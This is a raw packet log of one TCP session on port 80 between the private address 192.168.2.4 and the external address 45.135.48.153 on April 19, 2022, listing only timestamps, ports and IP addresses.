Apr 19, 2022 16:44:42.870043039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.870045900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.870089054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.870186090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.870309114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.870429039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.870491028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.870493889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.870549917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.870691061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.870747089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.870877981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.870943069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.870949030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871001959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871053934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871201038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871325016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871391058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871448994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871470928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871493101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871501923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871514082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871536016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871543884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871556997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871577978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871589899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871598959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871619940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871623039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871642113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871661901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871681929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871686935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871701956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871715069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871722937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871742010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871747971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871762991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871783972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.871798038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871830940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.871881962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.872026920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.872139931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.872195959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.872251034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.872301102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.872386932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.872489929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.872586012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.872641087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.873231888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.873295069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.873814106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.874474049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.875375032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.875459909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.875619888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.875752926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.875817060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.875818968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.875857115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.875866890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.875878096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876198053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876259089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876260042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876308918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876450062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876471996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876493931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876514912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876535892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876544952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876557112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876579046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876581907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876599073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876601934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876621008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876642942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876647949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876662970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876683950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876687050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876704931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876751900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876754045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.876797915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.876905918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877034903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877160072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877218962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.877219915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877265930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.877409935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877470970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877724886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877782106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.877799034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877865076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.877918959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.877990007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878196001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878230095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878254890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.878277063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.878371000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878503084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878566980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878587961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878622055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878638983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.878640890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878662109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878681898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878688097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.878700972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878721952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878741026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878746033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.878760099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878779888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.878779888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878801107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878802061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.878822088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878842115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878859997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.878861904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.878886938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.879719019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.880625963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.880647898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.880671024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.880701065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.880731106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.880794048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.880846024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.880922079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881051064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881115913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881166935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.881303072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881359100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.881369114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881500959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881566048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881616116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.881762028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881819963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.881824970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.881885052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882076979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882133961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882138968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882191896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882272959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882394075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882457018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882508993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882652998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882673979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882694006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882707119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882714987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882735968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882740974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882755995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882776022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882802963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882807016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882823944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882837057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882844925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882865906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882877111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882885933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882905960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882925034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882930994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882946014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882958889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882967949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.882986069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.882987022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883008003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883038044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.883114100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883225918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883337021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883342981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.883385897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.883465052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883588076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883649111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.883667946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.883691072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883780956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.883945942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.884007931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.884412050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.884430885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.885863066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.885948896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.886552095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.886605978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.886996031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887016058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887183905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887237072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.887315035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887361050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.887442112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887506962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887634993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887656927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887687922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.887705088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.887758017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887777090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887797117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887818098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887837887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887845039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.887860060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887877941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.887886047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887897968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.887907028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887928009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887947083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887948990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.887965918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887985945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.887994051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.888005972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.888031006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.888149977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.888273001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.888319016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.888336897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.888381004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.888528109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.888593912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.888784885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.888834000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.888848066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.888891935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.888978958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889106035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889235973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889283895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.889297962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889349937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.889489889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889619112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889745951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889767885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889799118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889801025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.889820099 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.889821053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889842987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889863014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889868021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.889883995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889904022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889923096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889931917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.889945984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889951944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.889966965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889987946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.889996052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.890007019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.890028000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.890047073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.890060902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.890068054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.890089035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.890091896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.890103102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.890182972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.890719891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.890772104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.891976118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.892220974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.892282009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.892350912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.892410994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.892477036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.892548084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.892674923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.892728090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.892801046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.892848015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.892930031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.892993927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.893184900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.893237114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.893309116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.893354893 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.893374920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.893502951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.893635988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.893683910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.893698931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.893747091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.893825054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.893949986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894077063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894098043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894119024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894125938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894139051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894155025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894159079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894191980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894193888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894212008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894231081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894243002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894251108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894270897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894290924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894299030 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.894310951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.894326925 CEST	49758	80	192.168.2.4	45.135.48.153
